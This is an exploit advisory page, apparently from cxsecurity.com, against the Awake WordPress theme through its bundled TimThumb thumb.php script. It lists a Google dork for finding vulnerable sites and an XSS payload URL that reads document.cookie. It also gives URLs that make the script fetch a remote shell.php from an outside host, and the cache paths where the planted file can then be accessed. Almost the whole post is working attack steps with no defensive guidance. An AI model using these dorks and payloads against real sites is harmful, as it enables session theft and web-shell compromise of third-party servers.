WordPress Themes Awake - Cross-Site Scripting

Published
Credit
Risk
2017.06.13
x0id
Low
CWE
CVE
Local
Remote
N/A
N/A
No
Yes

# Exploit Title: WordPress Themes Awake - Cross-Site Scripting
# Author: x0id
# Date: 13 June 2017
# Tested on: Windows 7

1) Search target with Google Dorking.
inurl:/wp-content/themes/awake
Index of /wp-content/themes/awake/

2) Exploit the websites.
https://localhost/wp-content/themes/awake/lib/scripts/thumb.php
Vulnerability? TimThumb version : 1.14 / 1.19

3) Proof of concept (PoC)
https://localhost/wp-content/themes/awake/lib/scripts/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg
https://localhost/wp-content/themes/awake/lib/scripts/thumb.php?src=http://
https://localhost/wp-content/themes/awake/lib/scripts/thumb.php?src=http://www.example.com/big_file&h=1&w=1
https://localhost/wp-content/themes/awake/lib/scripts/thumb.php?src=http://www.example.com/shell.php

4) Result file access.
https://localhost/wp-content/themes/awake/lib/scripts/cache/your-file.php
https://localhost/wp-content/themes/awake/lib/scripts/cache/1234567890.jpg

Indonesian h4x0r.


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com